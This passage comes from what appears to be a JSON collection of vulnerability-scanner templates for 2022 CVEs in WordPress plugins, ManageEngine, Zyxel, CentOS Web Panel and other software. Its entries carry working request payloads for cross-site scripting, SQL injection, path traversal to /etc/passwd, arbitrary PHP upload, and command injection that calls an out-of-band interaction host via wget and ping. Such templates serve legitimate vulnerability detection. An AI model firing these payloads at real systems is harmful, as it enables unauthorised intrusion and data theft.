/vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc2}}&hfoo={{cmd}}&hhook=array_map\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0087","info":{"name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/signin?from=https://interact.sh","{{BaseURL}}/signin?from=javascript:alert(document.cookie)"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"word","part":"body","words":["alert(document.cookie)"]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-24627","info":{"name":"AudioCodes Device Manager Express - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"audiocodes</title>\")"],"internal":true}]},{"raw":["POST /admin/AudioCodes_files/process_login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=&domain=&p=%5C%27or+1%3D1%23\n"],"matchers":[{"type":"word","part":"body","words":["SQL syntax","mysql_fetch","You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0342","info":{"name":"Zyxel - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["interface-name","saved at"],"condition":"and"},{"type":"word","part":"header","words":["text/zyxel","attachment; filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm('document_domain')</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>confirm('document_domain')</script>","Existing backups"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, 